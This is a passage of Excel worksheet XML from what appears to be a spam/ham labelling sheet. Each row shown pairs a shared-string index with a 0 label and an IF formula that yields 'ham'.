        <v>ham</v>
      </c>
    </row>
    <row r="5667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5667" t="s">
        <v>4974</v>
      </c>
      <c r="B5667">
        <v>0</v>
      </c>
      <c r="C5667" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5668" t="s">
        <v>4975</v>
      </c>
      <c r="B5668">
        <v>0</v>
      </c>
      <c r="C5668" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5669" t="s">
        <v>4976</v>
      </c>
      <c r="B5669">
        <v>0</v>
      </c>
      <c r="C5669" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5670" t="s">
        <v>4977</v>
      </c>
      <c r="B5670">
        <v>0</v>
      </c>
      <c r="C5670" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5671" t="s">
        <v>4978</v>
      </c>
      <c r="B5671">
        <v>0</v>
      </c>
      <c r="C5671" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5672" t="s">
        <v>4979</v>
      </c>
      <c r="B5672">
        <v>0</v>
      </c>
      <c r="C5672" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5673" t="s">
        <v>4980</v>
      </c>
      <c r="B5673">
        <v>0</v>
      </c>
      <c r="C5673" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5674" t="s">
        <v>4981</v>
      </c>
      <c r="B5674">
        <v>0</v>
      </c>
      <c r="C5674" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5675" t="s">
        <v>4982</v>
      </c>
      <c r="B5675">
        <v>0</v>
      </c>
      <c r="C5675" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5676" t="s">
        <v>4982</v>
      </c>
      <c r="B5676">
        <v>0</v>
      </c>
      <c r="C5676" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5677" t="s">
        <v>4982</v>
      </c>
      <c r="B5677">
        <v>0</v>
      </c>
      <c r="C5677" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5678" t="s">
        <v>4983</v>
      </c>
      <c r="B5678">
        <v>0</v>
      </c>
      <c r="C5678" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5679" t="s">
        <v>4984</v>
      </c>
      <c r="B5679">
        <v>0</v>
      </c>
      <c r="C5679" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5680" t="s">
        <v>4985</v>
      </c>
      <c r="B5680">
        <v>0</v>
      </c>
      <c r="C5680" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5681" t="s">
        <v>4986</v>
      </c>
      <c r="B5681">
        <v>0</v>
      </c>
      <c r="C5681" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5682" t="s">
        <v>21</v>
      </c>
      <c r="B5682">
        <v>0</v>
      </c>
      <c r="C5682" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5683" t="s">
        <v>4987</v>
      </c>
      <c r="B5683">
        <v>0</v>
      </c>
      <c r="C5683" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5684" t="s">
        <v>4988</v>
      </c>
      <c r="B5684">
        <v>0</v>
      </c>
      <c r="C5684" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5685" t="s">
        <v>4989</v>
      </c>
      <c r="B5685">
        <v>0</v>
      </c>
      <c r="C5685" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5686" t="s">
        <v>4990</v>
      </c>
      <c r="B5686">
        <v>0</v>
      </c>
      <c r="C5686" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5687" t="s">
        <v>4991</v>
      </c>
      <c r="B5687">
        <v>0</v>
      </c>
      <c r="C5687" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5688" t="s">
        <v>4992</v>
      </c>
      <c r="B5688">
        <v>0</v>
      </c>
      <c r="C5688" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5689" t="s">
        <v>4993</v>
      </c>
      <c r="B5689">
        <v>0</v>
      </c>
      <c r="C5689" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5690" t="s">
        <v>4994</v>
      </c>
      <c r="B5690">
        <v>0</v>
      </c>
      <c r="C5690" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5691" t="s">
        <v>4995</v>
      </c>
      <c r="B5691">
        <v>0</v>
      </c>
      <c r="C5691" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5692" t="s">
        <v>4996</v>
      </c>
      <c r="B5692">
        <v>0</v>
      </c>
      <c r="C5692" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5693" t="s">
        <v>4997</v>
      </c>
      <c r="B5693">
        <v>0</v>
      </c>
      <c r="C5693" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5694" t="s">
        <v>4998</v>
      </c>
      <c r="B5694">
        <v>0</v>
      </c>
      <c r="C5694" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5695" t="s">
        <v>4999</v>
      </c>
      <c r="B5695">
        <v>0</v>
      </c>
      <c r="C5695" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5696" t="s">
        <v>5000</v>
      </c>
      <c r="B5696">
        <v>0</v>
      </c>
      <c r="C5696" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5697" t="s">
        <v>5001</v>
      </c>
      <c r="B5697">
        <v>0</v>
      </c>
      <c r="C5697" t="str">
        <f t="shared" si="88"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5698" t="s">
        <v>5002</v>
      </c>
      <c r="B5698">
        <v>0</v>
      </c>
      <c r="C5698" t="str">
        <f t="shared" ref="C5698:C5761" si="89">IF(B5698="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5699" t="s">
        <v>5003</v>
      </c>
      <c r="B5699">
        <v>0</v>
      </c>
      <c r="C5699" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5700" t="s">
        <v>5004</v>
      </c>
      <c r="B5700">
        <v>0</v>
      </c>
      <c r="C5700" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5701" t="s">
        <v>5005</v>
      </c>
      <c r="B5701">
        <v>0</v>
      </c>
      <c r="C5701" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5702" t="s">
        <v>5006</v>
      </c>
      <c r="B5702">
        <v>0</v>
      </c>
      <c r="C5702" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5703" t="s">
        <v>21</v>
      </c>
      <c r="B5703">
        <v>0</v>
      </c>
      <c r="C5703" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5704" t="s">
        <v>5007</v>
      </c>
      <c r="B5704">
        <v>0</v>
      </c>
      <c r="C5704" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5705" t="s">
        <v>5008</v>
      </c>
      <c r="B5705">
        <v>0</v>
      </c>
      <c r="C5705" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5706" t="s">
        <v>21</v>
      </c>
      <c r="B5706">
        <v>0</v>
      </c>
      <c r="C5706" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5707" t="s">
        <v>5009</v>
      </c>
      <c r="B5707">
        <v>0</v>
      </c>
      <c r="C5707" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5708" t="s">
        <v>21</v>
      </c>
      <c r="B5708">
        <v>0</v>
      </c>
      <c r="C5708" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5709" t="s">
        <v>5010</v>
      </c>
      <c r="B5709">
        <v>0</v>
      </c>
      <c r="C5709" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5710" t="s">
        <v>5011</v>
      </c>
      <c r="B5710">
        <v>0</v>
      </c>
      <c r="C5710" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5711" t="s">
        <v>5012</v>
      </c>
      <c r="B5711">
        <v>0</v>
      </c>
      <c r="C5711" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5712" t="s">
        <v>5013</v>
      </c>
      <c r="B5712">
        <v>0</v>
      </c>
      <c r="C5712" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5713" t="s">
        <v>5014</v>
      </c>
      <c r="B5713">
        <v>0</v>
      </c>
      <c r="C5713" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5714" t="s">
        <v>5015</v>
      </c>
      <c r="B5714">
        <v>0</v>
      </c>
      <c r="C5714" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5715" t="s">
        <v>5016</v>
      </c>
      <c r="B5715">
        <v>0</v>
      </c>
      <c r="C5715" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5716" t="s">
        <v>5017</v>
      </c>
      <c r="B5716">
        <v>0</v>
      </c>
      <c r="C5716" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5717" t="s">
        <v>5018</v>
      </c>
      <c r="B5717">
        <v>0</v>
      </c>
      <c r="C5717" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5718" t="s">
        <v>5019</v>
      </c>
      <c r="B5718">
        <v>0</v>
      </c>
      <c r="C5718" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5719" t="s">
        <v>5020</v>
      </c>
      <c r="B5719">
        <v>0</v>
      </c>
      <c r="C5719" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5720" t="s">
        <v>5021</v>
      </c>
      <c r="B5720">
        <v>0</v>
      </c>
      <c r="C5720" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5721" t="s">
        <v>21</v>
      </c>
      <c r="B5721">
        <v>0</v>
      </c>
      <c r="C5721" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5722" t="s">
        <v>21</v>
      </c>
      <c r="B5722">
        <v>0</v>
      </c>
      <c r="C5722" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5723" t="s">
        <v>21</v>
      </c>
      <c r="B5723">
        <v>0</v>
      </c>
      <c r="C5723" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5724" t="s">
        <v>5022</v>
      </c>
      <c r="B5724">
        <v>0</v>
      </c>
      <c r="C5724" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5725" t="s">
        <v>5023</v>
      </c>
      <c r="B5725">
        <v>0</v>
      </c>
      <c r="C5725" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5726" t="s">
        <v>5024</v>
      </c>
      <c r="B5726">
        <v>0</v>
      </c>
      <c r="C5726" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5727" t="s">
        <v>5025</v>
      </c>
      <c r="B5727">
        <v>0</v>
      </c>
      <c r="C5727" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5728" t="s">
        <v>5026</v>
      </c>
      <c r="B5728">
        <v>0</v>
      </c>
      <c r="C5728" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5729" t="s">
        <v>5027</v>
      </c>
      <c r="B5729">
        <v>0</v>
      </c>
      <c r="C5729" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5730" t="s">
        <v>5028</v>
      </c>
      <c r="B5730">
        <v>0</v>
      </c>
      <c r="C5730" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5731" t="s">
        <v>5029</v>
      </c>
      <c r="B5731">
        <v>0</v>
      </c>
      <c r="C5731" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5732" t="s">
        <v>5030</v>
      </c>
      <c r="B5732">
        <v>0</v>
      </c>
      <c r="C5732" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5733" t="s">
        <v>5031</v>
      </c>
      <c r="B5733">
        <v>0</v>
      </c>
      <c r="C5733" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5734" t="s">
        <v>5032</v>
      </c>
      <c r="B5734">
        <v>0</v>
      </c>
      <c r="C5734" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5735" t="s">
        <v>5033</v>
      </c>
      <c r="B5735">
        <v>0</v>
      </c>
      <c r="C5735" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5736" t="s">
        <v>5034</v>
      </c>
      <c r="B5736">
        <v>0</v>
      </c>
      <c r="C5736" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5737" t="s">
        <v>5035</v>
      </c>
      <c r="B5737">
        <v>0</v>
      </c>
      <c r="C5737" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5738" t="s">
        <v>5036</v>
      </c>
      <c r="B5738">
        <v>0</v>
      </c>
      <c r="C5738" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5739" t="s">
        <v>5037</v>
      </c>
      <c r="B5739">
        <v>0</v>
      </c>
      <c r="C5739" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5740" t="s">
        <v>5038</v>
      </c>
      <c r="B5740">
        <v>0</v>
      </c>
      <c r="C5740" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5741" t="s">
        <v>5039</v>
      </c>
      <c r="B5741">
        <v>0</v>
      </c>
      <c r="C5741" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5742" t="s">
        <v>5040</v>
      </c>
      <c r="B5742">
        <v>0</v>
      </c>
      <c r="C5742" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5743" t="s">
        <v>5041</v>
      </c>
      <c r="B5743">
        <v>0</v>
      </c>
      <c r="C5743" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5744" t="s">
        <v>5042</v>
      </c>
      <c r="B5744">
        <v>0</v>
      </c>
      <c r="C5744" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5745" t="s">
        <v>5043</v>
      </c>
      <c r="B5745">
        <v>0</v>
      </c>
      <c r="C5745" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5746" t="s">
        <v>5044</v>
      </c>
      <c r="B5746">
        <v>0</v>
      </c>
      <c r="C5746" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5747" t="s">
        <v>5045</v>
      </c>
      <c r="B5747">
        <v>0</v>
      </c>
      <c r="C5747" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5748" t="s">
        <v>5046</v>
      </c>
      <c r="B5748">
        <v>0</v>
      </c>
      <c r="C5748" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5749" t="s">
        <v>5047</v>
      </c>
      <c r="B5749">
        <v>0</v>
      </c>
      <c r="C5749" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5750" t="s">
        <v>5048</v>
      </c>
      <c r="B5750">
        <v>0</v>
      </c>
      <c r="C5750" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5751" t="s">
        <v>5049</v>
      </c>
      <c r="B5751">
        <v>0</v>
      </c>
      <c r="C5751" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5752" t="s">
        <v>5050</v>
      </c>
      <c r="B5752">
        <v>0</v>
      </c>
      <c r="C5752" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5753" t="s">
        <v>5051</v>
      </c>
      <c r="B5753">
        <v>0</v>
      </c>
      <c r="C5753" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5754" t="s">
        <v>5052</v>
      </c>
      <c r="B5754">
        <v>0</v>
      </c>
      <c r="C5754" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5755" t="s">
        <v>5053</v>
      </c>
      <c r="B5755">
        <v>0</v>
      </c>
      <c r="C5755" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5756" t="s">
        <v>5054</v>
      </c>
      <c r="B5756">
        <v>0</v>
      </c>
      <c r="C5756" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5757" t="s">
        <v>5055</v>
      </c>
      <c r="B5757">
        <v>0</v>
      </c>
      <c r="C5757" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5758" t="s">
        <v>5056</v>
      </c>
      <c r="B5758">
        <v>0</v>
      </c>
      <c r="C5758" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5759" t="s">
        <v>5057</v>
      </c>
      <c r="B5759">
        <v>0</v>
      </c>
      <c r="C5759" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5760" t="s">
        <v>5058</v>
      </c>
      <c r="B5760">
        <v>0</v>
      </c>
      <c r="C5760" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5761" t="s">
        <v>5059</v>
      </c>
      <c r="B5761">
        <v>0</v>
      </c>
      <c r="C5761" t="str">
        <f t="shared" si="89"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5762" t="s">
        <v>5060</v>
      </c>
      <c r="B5762">
        <v>0</v>
      </c>
      <c r="C5762" t="str">
        <f t="shared" ref="C5762:C5825" si="90">IF(B5762="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5763" t="s">
        <v>5061</v>
      </c>
      <c r="B5763">
        <v>0</v>
      </c>
      <c r="C5763" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5764" t="s">
        <v>5062</v>
      </c>
      <c r="B5764">
        <v>0</v>
      </c>
      <c r="C5764" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5765" t="s">
        <v>5063</v>
      </c>
      <c r="B5765">
        <v>0</v>
      </c>
      <c r="C5765" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5766" t="s">
        <v>5064</v>
      </c>
      <c r="B5766">
        <v>0</v>
      </c>
      <c r="C5766" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5767" t="s">
        <v>5065</v>
      </c>
      <c r="B5767">
        <v>0</v>
      </c>
      <c r="C5767" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5768" t="s">
        <v>5066</v>
      </c>
      <c r="B5768">
        <v>0</v>
      </c>
      <c r="C5768" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5769" t="s">
        <v>5067</v>
      </c>
      <c r="B5769">
        <v>0</v>
      </c>
      <c r="C5769" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5770" t="s">
        <v>5068</v>
      </c>
      <c r="B5770">
        <v>0</v>
      </c>
      <c r="C5770" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5771" t="s">
        <v>5069</v>
      </c>
      <c r="B5771">
        <v>0</v>
      </c>
      <c r="C5771" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5772" t="s">
        <v>5070</v>
      </c>
      <c r="B5772">
        <v>0</v>
      </c>
      <c r="C5772" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5773" t="s">
        <v>5071</v>
      </c>
      <c r="B5773">
        <v>0</v>
      </c>
      <c r="C5773" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5774" t="s">
        <v>5072</v>
      </c>
      <c r="B5774">
        <v>0</v>
      </c>
      <c r="C5774" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5775" t="s">
        <v>5073</v>
      </c>
      <c r="B5775">
        <v>0</v>
      </c>
      <c r="C5775" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5776" t="s">
        <v>5074</v>
      </c>
      <c r="B5776">
        <v>0</v>
      </c>
      <c r="C5776" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5777" t="s">
        <v>5075</v>
      </c>
      <c r="B5777">
        <v>0</v>
      </c>
      <c r="C5777" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5778" t="s">
        <v>5076</v>
      </c>
      <c r="B5778">
        <v>0</v>
      </c>
      <c r="C5778" t="str">
        <f t="shared" si="90"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5779" spans="1:3" x14ac:dyDescent="0.3">
